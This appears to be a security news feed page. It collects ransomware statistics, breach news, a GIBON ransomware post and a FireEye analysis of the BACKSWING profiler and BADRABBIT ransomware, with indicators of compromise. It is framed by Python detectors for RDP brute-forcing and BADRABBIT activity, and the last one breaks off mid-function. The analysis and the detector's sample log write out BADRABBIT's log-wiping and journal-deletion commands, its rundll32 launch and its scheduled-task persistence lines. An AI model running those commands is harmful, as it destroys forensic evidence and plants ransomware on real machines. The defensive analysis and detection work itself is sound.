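# Constructed sample: one external source cycles through accounts against RDP
# and finally authenticates as 'backup'; an office user mistypes twice; a
# console failure (LogonType 2) is present to show it is ignored.
SAMPLE_EVENTS = [
    "Time=2017-08-14T02:10:01|EventID=4625|LogonType=10|TargetUserName=Administrator|IpAddress=203.0.113.7",
    "Time=2017-08-14T02:10:04|EventID=4625|LogonType=10|TargetUserName=admin|IpAddress=203.0.113.7",
    "Time=2017-08-14T02:10:09|EventID=4625|LogonType=10|TargetUserName=backup|IpAddress=203.0.113.7",
    "Time=2017-08-14T02:10:15|EventID=4625|LogonType=10|TargetUserName=scanner|IpAddress=203.0.113.7",
    "Time=2017-08-14T02:10:22|EventID=4625|LogonType=10|TargetUserName=sql|IpAddress=203.0.113.7",
    "Time=2017-08-14T02:10:31|EventID=4625|LogonType=10|TargetUserName=backup|IpAddress=203.0.113.7",
    "Time=2017-08-14T02:11:02|EventID=4624|LogonType=10|TargetUserName=backup|IpAddress=203.0.113.7",
    "Time=2017-08-14T08:59:40|EventID=4625|LogonType=10|TargetUserName=jsmith|IpAddress=10.20.0.55",
    "Time=2017-08-14T08:59:52|EventID=4625|LogonType=10|TargetUserName=jsmith|IpAddress=10.20.0.55",
    "Time=2017-08-14T09:00:03|EventID=4624|LogonType=10|TargetUserName=jsmith|IpAddress=10.20.0.55",
    "Time=2017-08-14T09:05:00|EventID=4625|LogonType=2|TargetUserName=jsmith|IpAddress=-",
]


def run(lines=SAMPLE_EVENTS):
    return detect_rdp_bruteforce([parse_event(line) for line in lines])


if __name__ == "__main__":
    for ip, summary in run().items():
        print(ip, summary)
```

The distinct-accounts list is what separates a user who mistypes from a brute-forcer: five different names from one address in thirty seconds is a password spray, and a 4624 from that address afterwards means the host should be treated as compromised, not merely probed. Detection is the second line here; the first remains the bulletin's advice to keep RDP off the Internet entirely.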

Ransomware: a year in numbers

It is important not to read too much into the absolute numbers as they reflect changes in detection methodology as much as they do evolution of the landscape. Having said that, a few top line trends are worth noting:

  • The level of innovation appears to be declining – in 2017, 38 new strains of encryption ransomware were deemed interesting and different enough to be designated as new ‘families’, compared to 62 in 2016. This could be due to the fact that the crypto-ransomware model is fairly limited and it is becoming progressively more difficult for malware developers to invent something new.
  • There were many more modifications of new and existing ransomware detected in 2017: over 96,000 compared to 54,000 in 2016. The rise in modifications may reflect attempts by attackers to obfuscate their ransomware as security solutions get better at detecting them.
  • The number of attacks as defined by hits against Kaspersky Lab customers remained fairly constant. In fact, the big spikes of 2016 have been replaced with a more consistent monthly spread. Overall, just under 950,000 unique users were attacked in 2017, compared to around 1.5 million in 2016. However, this data includes both encryptors and their downloaders; if you look at the numbers for encryptors only, the attack data for 2017 is similar to 2016. This makes sense if you consider that many attackers are starting to distribute their ransomware through other means, such as brute-forcing passwords and manual launching. These numbers do not include the many computers around the world unprotected by our solutions that fell victim to WannaCry – this number has been estimated at around 727,000 unique IP addresses.
  • WannaCry, ExPetr and BadRabbit notwithstanding, the number of attacks targeting corporates increased only slightly: 26.2% in 2017 compared to 22.6% in 2016. Just over 4% of those targeted in 2017 were SMBs.

Further details on these trends, including the most affected countries and top ransomware families, can be found in the Kaspersky Security Bulletin 2017 Statistics Report.

According to Kaspersky Lab’s annual IT security survey

  • 65% of businesses that were hit by ransomware in 2017 said they lost access to a significant amount or even all their data; while 29% said that although they were able to decrypt their data, a significant number of files were lost forever. These figures are largely consistent with those for 2016.
  • 34% of those affected took a week if not more to restore full access, up from 29% in 2016.
  • 36% paid the ransom – but 17% of them never recovered their data (32% and 19% in 2016).

Conclusion: what next for ransomware?

In 2017, we saw ransomware apparently being used by advanced threat actors to mount attacks for data destruction rather than for pure financial gain. The number of attacks on consumers, SMBs and enterprises remained high, but they mainly involved existing or modified code from known or generic families.

Is the ransomware business model starting to crack? Is there a more lucrative alternative for cybercriminals motivated by financial gain? One possibility could be cryptocurrency mining. Kaspersky Lab’s threat predictions for cryptocurrencies in 2018 suggest a rise in targeted attacks for the purpose of installing miners. While ransomware provides a potentially large but one-off income, miners can result in lower but longer earnings, and this could be a tempting prospect for many attackers in ransomware’s current turbulent landscape. But one thing’s for sure, ransomware won’t just disappear – neither as a direct threat, nor as a disguise for deeper attacks.

The fight against ransomware continues

  • Through collaboration: On July 25, 2016, the No More Ransom initiative was launched by Kaspersky Lab, the Dutch National Police, Europol, and McAfee. It is a unique example of the power of joint public-private collaboration to both fight cybercriminals and help their victims with expertise, tips and decryption tools. One year on, the project has 109 partners and is available in 26 languages. The online portal carries 54 decryption tools, which between them cover 104 families of ransomware. To date, more than 28,000 devices have been decrypted, depriving cybercriminals of an estimated US$9.5 million in ransom.
  • Through intelligence: Kaspersky Lab has monitored the ransomware threat from the start, and was one of the first to provide regular threat intelligence updates on extortion malware in order to boost industry awareness. The company publishes regular overviews of the evolving ransomware landscape, for instance, here and here.
  • Through technology: Kaspersky Lab offers multi-layered protection against this widespread and increasing threat, including a free anti-ransomware tool that anyone can download and use, regardless of the security solution they use. The company’s products include a further layer of technology: System Watcher, which can block and roll back malicious changes made on a device, such as the encryption of files or the blocking of access to the screen.

Uber paid hackers to cover up a data theft affecting 57 million people

The US company Uber suffered a massive data theft in October 2016. 57 million driver and customer accounts were affected. Uber not only kept this data loss secret from those affected, it also paid the hackers 100,000 US dollars to delete the data and keep quiet about it. The stolen data includes customers’ email addresses and telephone numbers and personal information […]

Ransomware remains a problem, and not only for Windows

Ransomware has hit businesses and private users conspicuously hard this year. Based on its analysis of data from April to October 2017, SophosLabs predicts that next year will also be shaped by ransomware and Ransomware as a Service (RaaS), including do-it-yourself kits. In future, however, Linux, Mac and Android users will have to arm themselves alongside Windows users. […]

How GIBON Ransomware Created a Benchmark for Response Time

We all remember WannaCry and Petya. How could you forget them? Their rampant spread and malicious maneuvers are burned into memory. But there was one upside to the nasty ransomware campaigns – we learned from them. We adapted and we got agile. So when GIBON ransomware came into town, we were ready to rumble.

Meet GIBON: a new ransomware strain currently for sale on dark web forums for $500 USD. (It gets its name from the “GIBON” user-agent string the malware sends when it connects to its command-and-control (C&C) server, and from its administration panel, which calls itself “Encryption Machine GIBON.”)

It makes its way from forums to victims’ devices through phishing emails carrying macro-laden attachments that download and execute the malware payload on the victim’s PC. GIBON then connects to the C&C server and registers the new victim by sending a base64-encoded string containing a timestamp. Following that, it generates an encryption key and begins locking up every file it can find on the device, to be returned, of course, only for a fee paid in cryptocurrency. Once every file is encrypted, the strain reports back to the C&C server that it has finished, so the server can timestamp the event and record the number of files encrypted. Simple enough.

GIBON, like many ransomware strains, proves that these attacks don’t have to be very complicated in order to be effective. However, that effectiveness has dwindled in recent attack campaigns. In fact, a decryptor is already available for GIBON — which represents a benchmark for our response time to these attacks.

Christiaan Beek, lead scientist and principal engineer at McAfee, says response time is only improving. “The cybersecurity world is indeed responding faster than before, especially after WannaCry, which was another wake-up call… The moment researchers see that a decryptor is available, we go on and continue to hunt down the next one or learn from the previous ones and start innovating or fine-tuning our products.” Beek continues, “Ransomware has sparked and forced the infosec industry to think and innovate about solutions more than other malware-related threats.”

Basically, the industry now more than ever is expediting how cybersecurity professionals adapt to threats and how quickly they apply learnings to the next go around. White hats are becoming faster in the race against cybercrime, and increasing their chances of eventually getting ahead of these threats.

That’s exactly why we created McAfee Ransomware Recover (Mr2), a new ransomware decryption framework that allows for the rapid incorporation of decryption keys and custom decryption logic (as they become available) and gets help to ransomware victims much faster. That way, we can continue to combat these threats quickly and effectively, and put ourselves in the best position possible to win the fight against cybercrime.

To learn more about GIBON ransomware, and others like it, be sure to follow @McAfee and @McAfee_Labs on Twitter.

The post How GIBON Ransomware Created a Benchmark for Response Time appeared first on McAfee Blogs.

Malware outlook 2018: Android, beware of ransomware!

2017 is almost history, and with that the season of year-end reviews begins. SophosLabs has analyzed the malware of 2017 and drawn up forecasts. A dominant security topic in 2017 is malware for mobile devices, primarily Android. SophosLabs estimates that there will be around 10 million suspicious Android apps by the end of 2017, among them ransomware such as, for example, […]

Weekly Cyber Risk Roundup: Bad Rabbit Halted, Law Firm Breach Raises Questions

The week’s top trending event was the outbreak of Bad Rabbit ransomware, which quickly spread across Russia and Eastern Europe before most of the infrastructure behind the attack was taken offline hours later. 


Bad Rabbit was largely spread via watering hole attacks using compromised news media websites that prompted users to install a fake “Flash Update.” Symantec reported that the vast majority of infection attempts occurred in Russia within the first two hours of the malware’s appearance, but there were also infection attempts observed in Japan, Bulgaria, Ukraine, the U.S., and other countries.

The malware used an SMB component as well as the “Mimikatz” tool, along with some hard-coded default usernames and passwords, to attempt to spread laterally across a network after infection. It was later discovered that the malware also leveraged the leaked NSA exploit EternalRomance in a way that was “very similar to the publicly available Python implementation of the EternalRomance exploit” used by the NotPetya (or Nyetya) malware.

“The BadRabbit exploit implementation is different than the one in Nyetya, although it is still largely based on the EternalRomance exploit published in the ShadowBrokers leak,” Cisco researchers wrote. “We can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel’s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor.”

Those infected with Bad Rabbit were directed to a Tor payment page and presented with a countdown timer for when the ransom demand would increase, starting at 0.05 bitcoin (around $280). The Register reported that various researchers have found that recovering infected machines appeared difficult, but not impossible.


Other trending cybercrime events from the week include:

  • TheDarkOverlord targets surgery clinic: TheDarkOverlord said it has stolen terabytes of data from London Bridge Plastic Surgery, including sensitive photos and information on some high-profile clients. “We have TBs [terabytes] of this shit. Databases, names, everything,” a representative from The Dark Overlord told The Daily Beast. “There are some royal families in here.” The clinic confirmed that it was likely breached and said it has launched an investigation into the stolen data.
  • Cryptocurrency-related cybercrime: A phishing scam impersonating MyEtherWallet managed to trick several users into handing over the passwords to their wallets, and as a result approximately $16,000 was stolen. Coinhive, which provides websites with a JavaScript miner, said that its Cloudflare account was hijacked due to the use of an insecure password and lack of two-factor authentication, and as a result the attacker was able to steal hashes from users. Coincafe said that an unauthorized third party gained access to a system that was decommissioned in 2014 containing customers’ personal information, and the third party then contacted some of those customers and said they would erase their compromised data for a fee. The website for the new cryptocurrency Bitcoin Gold was taken offline by a DDoS attack.
  • Updates on previously disclosed breaches: Whole Foods said its payment card breach affected nearly 100 locations. U.S. Cellular said an investigation into automated attacks against online user accounts in June revealed that the incident also exposed bank account and routing numbers. West Music, which operates westmusic.com and percussionsource.com, is the latest company to notify customers of a payment card breach tied to third-party payment processor Aptos. Alliance College-Ready Public Schools said they are one of multiple school districts and charter networks affected by a vulnerability that exposed information from the school data platform Schoolzilla. The NSA contractor tied to the leak of confidential hacking tools allegedly disabled his antivirus and infected his computer with malware when installing a pirated version of Microsoft Office.
  • Other notable events: A contractor lost control of a Dell customer support website designed to help customers restore their data and computers to their factory default state, and the hijacked website may have been used to push malware while it was compromised. Researchers discovered two publicly exposed MongoDB databases belonging to Tarte Cosmetics that contained the personal information of nearly two million customers. FirstHealth of the Carolinas, which has more than 100 physical locations, said that a WannaCry variant forced the shutdown of its network to prevent the malware from spreading. Memory4Less is notifying customers that their personal information may have been compromised due to an unauthorized user installing malware on its network between November 2016 and September 2017. LightHouse Management Services and the Iowa Department of Human Services announced employee email account breaches. COL Financial Group said it has experienced a “possible breach.” Two websites run by the Czech Statistical Office that reported the results of the country’s parliamentary elections were temporarily taken offline by DDoS attacks.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.


Cyber Risk Trends From the Past Week

The offshore law firm Appleby said that client data was stolen last year, and the International Consortium of Investigative Journalists (ICIJ), which obtained the hacked data, has contacted the firm over allegations of wrongdoing and says it plans on publishing a series of stories related to the breach.

Business Insider reported that the law firm’s super-rich clients are “bracing themselves for the exposure of their financial secrets.” The incident has echoes of the 2016 “Panama Papers” leak, which involved the Panama-based law firm Mossack Fonseca and has led to numerous consequences around the globe — including the resignation of prime ministers in Iceland and Pakistan, and calls for the impeachment of Ukraine’s president.

It is unclear at the moment what fallout, if any, may occur due to the breach at Bermuda-based Appleby, and it is important to note that the company said in a statement that it has found no evidence of wrongdoing.

“We are disappointed that the media may choose to use information which could have emanated from material obtained illegally and that this may result in exposing innocent parties to data protection breaches,” the company said. “Having researched the ICIJ’s allegations we believe they are unfounded and based on a lack of understanding of the legitimate and lawful structures used in the offshore sector.”

However, there have already been reports that the leak has led to renewed scrutiny of Glencore Plc’s acquisition of Katanga Mining Ltd., which runs copper and cobalt mines in Congo, and claims that aircraft buyers may have used the Isle of Man for abusive Value Added Tax (VAT) avoidance.

Appleby’s clients include FTSE 100 and Fortune 500 companies, and the breach serves as a reminder that law firms are often the target of malicious actors due to the combination of sensitive documents they hold along with the potentially weaker security inherent in some third parties. Additional documents and reporting related to the Appleby breach will likely be published throughout the coming months.


BACKSWING – Pulling a BADRABBIT Out of a Hat

Executive Summary

On Oct. 24, 2017, coordinated strategic web compromises started to distribute BADRABBIT ransomware to unwitting users. FireEye appliances detected the download attempts and blocked our user base from infection. During our investigation into the activity, FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we’ve been tracking as BACKSWING. We’ve identified 51 sites hosting BACKSWING and four confirmed to drop BADRABBIT. Throughout 2017, we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites. The pattern of deployment raises the possibility of a strategic sponsor with specific regional interests and suggests a motivation other than financial gain. Given that many domains are still compromised with BACKSWING, we anticipate that there is a risk that they will be used for future attacks.

Incident Background

Beginning on Oct. 24 at 08:00 UTC, FireEye detected and blocked attempts to infect multiple clients with a drive-by download masquerading as a Flash Update (install_flash_player.exe) that delivered a wormable variant of ransomware. Users were redirected to the infected site from multiple legitimate sites (e.g. http://www.mediaport[.]ua/sites/default/files/page-main.js) simultaneously, indicating a coordinated and widespread strategic web compromise campaign.

FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany, Japan, and the U.S. until Oct. 24 at 15:00 UTC, when the infection attempts ceased and attacker infrastructure – both 1dnscontrol[.]com and the legitimate websites containing the rogue code – were taken offline.

BACKSWING Framework Likely Connected to BADRABBIT Activity

Strategic web compromises can have a significant amount of collateral targeting. It is common for threat actors to pair a strategic web compromise with profiling malware to target systems with specific application versions or victims. FireEye observed that BACKSWING, a malicious JavaScript profiling framework, was deployed to at least 54 legitimate sites starting as early as September 2016.  A handful of these sites were later used to redirect to BADRABBIT distribution URLs.

FireEye iSIGHT Intelligence tracks two distinct versions of BACKSWING that contain the same functionality, but differ in their code styles. We consider BACKSWING a generic container used to select attributes of the current browsing session (User-Agent, HTTP Referrer, Cookies, and the current domain). This information is then relayed to a “C2”, sometimes referred to as a “receiver.” If the receiver is online, the server returns a unique JSON blob to the caller, which is then parsed by the BACKSWING code (Figure 1).


Figure 1: BACKSWING Reply

BACKSWING expects the JSON blob to have two fields, “InjectionType” (expected to be an integer) and “InjectionString” (expected to be a string containing HTML content). BACKSWING version 1 (Figure 2) explicitly branches on the value of “InjectionType” into two code paths:

  • If InjectionType == 1 (Redirect browser to URL)
  • If InjectionType != 1 (render HTML into the DOM)


Figure 2: Backswing Version 1

In Version 2 (Figure 3), BACKSWING retains similar logic, but generalizes the InjectionString to be handled strictly to render the reply into the DOM.


Figure 3: BACKSWING Version 2

Version 1:

  • FireEye observed the first version of BACKSWING in late 2016 on websites belonging to a Czech Republic hospitality organization in addition to a government website in Montenegro. Turkish-tourism websites were also injected with this profiler.
  • BACKSWING v1 was commonly injected in cleartext to affected websites, but over time, actors began to obfuscate the code using the open-source Dean-Edwards Packer and injected it into legitimate JavaScript resources on affected websites. Figure 4 shows the injection content.
  • Beginning in May 2017, FireEye observed a number of Ukrainian websites compromised with BACKSWING v1, and in June 2017, began to see content returned from BACKSWING receivers.
  • In late June 2017, BACKSWING servers returned an HTML div element with two distinct identifiers. When decoded, BACKSWING v1 embedded two div elements within the DOM with values of 07a06a96-3345-43f2-afe1-2a70d951f50a and 9b142ec2-1fdb-4790-b48c-ffdf22911104. No additional content was observed in these replies.


Figure 4: BACKSWING Injection Content

Version 2:

  • The earliest that FireEye observed BACKSWING v2 was on Oct. 5, 2017, across multiple websites that previously hosted BACKSWING v1.
  • BACKSWING v2 was predominantly injected into legitimate JavaScript resources hosted on affected websites; however, some instances were injected into the sites’ main pages.
  • FireEye observed a limited number of websites hosting this version that were also implicated in suspected BADRABBIT infection chains (detailed in Table 1).

Malicious profilers allow attackers to obtain more information about potential victims before deploying payloads (in this case, the BADRABBIT “flash update” dropper). While FireEye has not directly observed BACKSWING delivering BADRABBIT, BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol[.]com, which hosted the BADRABBIT dropper. 

Table 1 highlights the legitimate sites hosting BACKSWING that were also used as HTTP referrers for BADRABBIT payload distribution.

| Compromised Website | BACKSWING Receiver | BACKSWING Version | Observed BADRABBIT Redirect |
|---|---|---|---|
| blog.fontanka[.]ru | Not Available | Not Available | 1dnscontrol[.]com |
| www.aica.co[.]jp | http://185.149.120[.]3/scholargoogle/ | v2 | 1dnscontrol[.]com |
| www.fontanka[.]ru | http://185.149.120[.]3/scholargoogle/ | v2 | 1dnscontrol[.]com |
| www.mediaport[.]ua | http://172.97.69[.]79/i/ | v1 | 1dnscontrol[.]com |
| www.mediaport[.]ua | http://185.149.120[.]3/scholargoogle/ | v2 | 1dnscontrol[.]com |
| www.smetkoplan[.]com | http://172.97.69[.]79/i/ | v1 | 1dnscontrol[.]com |
| www.smetkoplan[.]com | http://38.84.134[.]15/Core/Engine/Index/default | v1 | 1dnscontrol[.]com |
| www.smetkoplan[.]com | http://185.149.120[.]3/scholargoogle/ | v2 | 1dnscontrol[.]com |

Table 1: Sites hosting BACKSWING profilers that redirected users to a BADRABBIT download site

The compromised websites listed in Table 1 demonstrate one of the first times that we have observed the potential weaponization of BACKSWING. FireEye is tracking a growing number of legitimate websites that also host BACKSWING, underscoring a considerable footprint the actors could leverage in future attacks. Table 2 provides a list of sites also compromised with BACKSWING.

| Compromised Website | BACKSWING Receiver | BACKSWING Version |
|---|---|---|
| akvadom.kiev[.]ua | http://172.97.69[.]79/i/ | v1 |
| bahmut.com[.]ua | http://dfkiueswbgfreiwfsd[.]tk/i/ | v1 |
| bitte.net[.]ua | http://172.97.69[.]79/i/ | v1 |
| bon-vivasan.com[.]ua | http://172.97.69[.]79/i/ | v1 |
| bonitka.com[.]ua | http://172.97.69[.]79/i/ | v1 |
| camp.mrt.gov[.]me | http://38.84.134[.]15/Core/Engine/Index/two | v1 |
| Evrosmazki[.]ua | http://172.97.69[.]79/i/ | v1 |
| forum.andronova[.]net | http://172.97.69[.]79/i/ | v1 |
| forum.andronova[.]net | http://91.236.116[.]50/Core/Engine/Index/two | v1 |
| grandua[.]ua | http://172.97.69[.]79/i/ | v1 |
| grupovo[.]bg | http://185.149.120[.]3/scholargoogle/ | v2 |
| hr.pensionhotel[.]com | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| i24.com[.]ua | http://172.97.69[.]79/i/ | v1 |
| i24.com[.]ua | http://185.149.120[.]3/scholargoogle/ | v2 |
| icase.lg[.]ua | http://172.97.69[.]79/i/ | v1 |
| montenegro-today[.]com | http://38.84.134[.]15/Core/Engine/Index/two | v1 |
| montenegro-today[.]ru | http://172.97.69[.]79/i/ | v1 |
| most-dnepr[.]info | http://172.97.69[.]79/i/ | v1 |
| most-dnepr[.]info | http://185.149.120[.]3/scholargoogle/ | v2 |
| obereg-t[.]com | http://172.97.69[.]79/i/ | v1 |
| sarktur[.]com | http://104.244.159[.]23:8080/i | v1 |
| sarktur[.]com | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| school12.cn[.]ua | http://172.97.69[.]79/i/ | v1 |
| sinematurk[.]com | http://91.236.116[.]50/Core/Engine/Index/two | v1 |
| vgoru[.]org | http://172.97.69[.]79/i/ | v1 |
| www.2000[.]ua | http://172.97.69[.]79/i/ | v1 |
| www.444android[.]com | http://172.97.69[.]79/i/ | v1 |
| www.444android[.]com | http://91.236.116[.]50/Core/Engine/Index/two | v1 |
| www.aica.co[.]jp | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.alapli.bel[.]tr | http://91.236.116[.]50/Core/Engine/Index/two | v1 |
| www.ambilet[.]ro | http://185.149.120[.]3/scholargoogle/ | v2 |
| www.andronova[.]net | http://91.236.116[.]50/Core/Engine/Index/two | v1 |
| www.chnu.edu[.]ua | http://172.97.69[.]79/i/ | v1 |
| www.dermavieskin[.]com | https://bodum-online[.]gq/Core/Engine/Index/three | v1 |
| www.evrosmazki[.]ua | http://172.97.69[.]79/i/ | v1 |
| www.hercegnovi[.]me | http://38.84.134[.]15/Core/Engine/Index/two | v1 |
| www.len[.]ru | http://185.149.120[.]3/scholasgoogle/ | v2 |
| www.montenegro-today[.]com | http://38.84.134[.]15/Core/Engine/Index/two | v1 |
| www.montenegro-today[.]com | http://91.236.116[.]50/Core/Engine/Index/two | v1 |
| www.otbrana[.]com | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.pensionhotel[.]be | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.pensionhotel[.]cz | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.pensionhotel[.]de | http://172.97.69[.]79/i/ | v1 |
| www.pensionhotel[.]de | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.pensionhotel[.]dk | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.pensionhotel[.]nl | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.pensionhotel[.]pl | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.pensionhotel[.]ro | http://46.20.1[.]98/scholargoogle/ | v1 |
| www.pensionhotel[.]sk | http://38.84.134[.]15/Core/Engine/Index/default | v1 |
| www.sinematurk[.]com | http://91.236.116[.]50/Core/Engine/Index/two | v1 |
| www.t.ks[.]ua | http://172.97.69[.]79/i/ | v1 |
| www.teknolojihaber[.]net | http://91.236.116[.]50/Core/Engine/Index/two | v1 |
| www.uscc[.]ua | http://172.97.69[.]79/i/ | v1 |
| www.vertizontal[.]ro | http://91.236.116[.]50/Core/Engine/Index/three | v1 |
| www.visa3777[.]com | http://172.97.69[.]79/i/ | v1 |
| www.www.pensionhotel[.]de | http://38.84.134[.]15/Core/Engine/Index/default | v1 |

Table 2: Additional sites hosting BACKSWING profilers and associated receivers

The distribution of sites compromised with BACKSWING suggests a motivation other than financial gain. FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year. We observed a spike of BACKSWING instances on Ukrainian sites, with a significant increase in May 2017. While some sites hosting BACKSWING do not have a clear strategic link, the pattern of deployment raises the possibility of a strategic sponsor with specific regional interests.

BADRABBIT Components

BADRABBIT is made up of several components, as described in Figure 5.


Figure 5: BADRABBIT components

Install_flashPlayer.exe (MD5: FBBDC39AF1139AEBBA4DA004475E8839)

The install_flashplayer.exe payload drops infpub.dat (MD5: C4F26ED277B51EF45FA180BE597D96E8) to the C:\Windows directory and executes it using rundll32.exe with the argument C:\Windows\infpub.dat,#1 15. This execution format mirrors that of EternalPetya.

infpub.dat (MD5: 1D724F95C61F1055F0D02C2154BBCCD3)

The infpub.dat binary is the primary ransomware component responsible for dropping and executing the additional components shown in the BADRABBIT Components section. An embedded RSA-2048 key facilitates the encryption process, which uses an AES-128 key to encrypt files. The extensions listed below are targeted for encryption:

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

The following directories are ignored during the encryption process:

  • \Windows
  • \Program Files
  • \ProgramData
  • \AppData

The malware writes its ransom message to the root of each affected drive with the filename Readme.txt.

The infpub.dat is capable of performing lateral movement via WMI or SMB. Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network. The malware contains lists of common usernames, passwords, and named pipes that it can use to brute-force other credentials for lateral movement.

If one of four Dr.Web antivirus processes is present on the system, file encryption is not performed. If the malware is executed with the “-f” command line argument, credential theft and lateral movement are bypassed.

dispci.exe (MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)

The dispci.exe binary interacts with the DiskCryptor driver (cscc.dat) to install the malicious bootloader. If one of three McAfee antivirus processes is running on the system, dispci.exe is written to the %ALLUSERSPROFILE% directory; otherwise, it is written to C:\Windows. The sample is executed on system start using a scheduled task named rhaegal.

cscc.dat (MD5s: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A)

A 32 or 64-bit DiskCryptor driver named cscc.dat facilitates disk encryption. It is installed in the C:\Windows directory as a kernel driver service named cscc.

Mimikatz usage (MD5s: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977)

A 32 or 64-bit Mimikatz variant is written to a temporary file (e.g., 651D.tmp) in the C:\Windows directory and executed by passing a named pipe string (e.g., \\.\pipe\{8A93FA32-1B7A-4E2F-AAD2-76A095F261DC}) as an argument. Harvested credentials are passed back to infpub.dat via the named pipe, similar to EternalPetya.

BADRABBIT Compared to EternalPetya

The infpub.dat contains a checksum algorithm like the one used in EternalPetya. However, the initial checksum value differs slightly: 0x87654321 in infpub.dat, 0x12345678 in EternalPetya. infpub.dat also supports the same command line arguments as EternalPetya with the addition of the “-f” argument, which bypasses the malware’s credential theft and lateral movement capabilities.

Like EternalPetya, infpub.dat determines if a specific file exists on the system and will exit if found. The file in this case is cscc.dat. infpub.dat contains a wmic.exe lateral movement capability, but unlike EternalPetya, does not contain a PSEXEC binary used to perform lateral movement.

Both samples utilize the same series of wevtutil and fsutil commands to perform anti-forensics:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%

FireEye Detections

| Product | Detection Names |
|---|---|
| NX, EX, AX, FX, ETP | malware.binary.exe, Trojan.Ransomware.MVX, Exploit.PossibleWaterhole.BACKSWING |
| HX | BADRABBIT RANSOMWARE (FAMILY), Gen:Heur.Ransom.BadRabbit.1, Gen:Variant.Ransom.BadRabbit.1 |
| TAP | WINDOWS METHODOLOGY [Scheduled Task Created], WINDOWS METHODOLOGY [Service Installation], WINDOWS METHODOLOGY [Audit Log Cleared], WINDOWS METHODOLOGY [Rundll32 Ordinal Arg], WINDOWS METHODOLOGY [Wevtutil Clear-log], WINDOWS METHODOLOGY [Fsutil USN Deletejournal], WINDOWS METHODOLOGY [Multiple Admin Share Failures] |
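The host-side methodology in the detection table above (rundll32 with an ordinal argument, the rhaegal and drogon scheduled tasks, wevtutil log clearing, USN journal deletion, and the three component paths) can be matched directly in process-creation telemetry. The following is an added example and not FireEye's or McAfee's code: the pipe-delimited log format, host names and sample records are constructed for this illustration, while the rule names, task names and file paths come from this page.

```python
"""Match BADRABBIT host methodology in process-creation logs and correlate per host."""
import re
from collections import defaultdict

# Rule names mirror the TAP "WINDOWS METHODOLOGY" detections and the
# Access Protection file paths listed on this page.
RULES = [
    ("Rundll32 Ordinal Arg",
     re.compile(r"rundll32(\.exe)?\s+\S+,#\d+", re.I)),
    ("Scheduled Task Created",
     re.compile(r"schtasks\s+/Create\b", re.I)),
    ("Known BADRABBIT task name",
     re.compile(r"/TN\s+(rhaegal|drogon)\b", re.I)),
    ("Wevtutil Clear-log",
     re.compile(r"wevtutil\s+cl\s+(Setup|System|Security|Application)\b", re.I)),
    ("Fsutil USN Deletejournal",
     re.compile(r"fsutil\s+usn\s+deletejournal\b", re.I)),
    ("BADRABBIT component path",
     re.compile(r"C:\\Windows\\(infpub\.dat|cscc\.dat|dispci\.exe)\b", re.I)),
]

# Constructed process-creation records (format is assumed for this example):
# timestamp|host|parent image|command line
SAMPLE_LOG = [
    r"2017-10-24T08:03:10Z|WS01|install_flash_player.exe|\system32\rundll32.exe C:\Windows\infpub.dat,#1 15",
    r'2017-10-24T08:03:12Z|WS01|rundll32.exe|cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "cmd.exe /C Start C:\Windows\dispci.exe -id 4711"',
    r'2017-10-24T08:03:12Z|WS01|rundll32.exe|cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "shutdown.exe /r /t 0 /f" /ST 08:20:00',
    r"2017-10-24T08:03:14Z|WS01|rundll32.exe|cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:",
    # Benign activity on a second host: a named-export rundll32 call and an admin backup task.
    r"2017-10-24T09:00:00Z|WS02|explorer.exe|rundll32.exe shell32.dll,Control_RunDLL",
    r"2017-10-24T09:05:00Z|WS02|cmd.exe|schtasks /Create /SC DAILY /TN NightlyBackup /TR C:\Tools\backup.cmd /ST 02:00",
]


def parse_line(line):
    """Split one record into (timestamp, host, parent, command line)."""
    ts, host, parent, cmdline = line.split("|", 3)
    return ts, host, parent, cmdline


def match_rules(cmdline):
    """Return the names of every rule whose pattern occurs in the command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan(lines):
    """Map each host to the set of distinct methodology rules it triggered."""
    hits = defaultdict(set)
    for line in lines:
        _, host, _, cmdline = parse_line(line)
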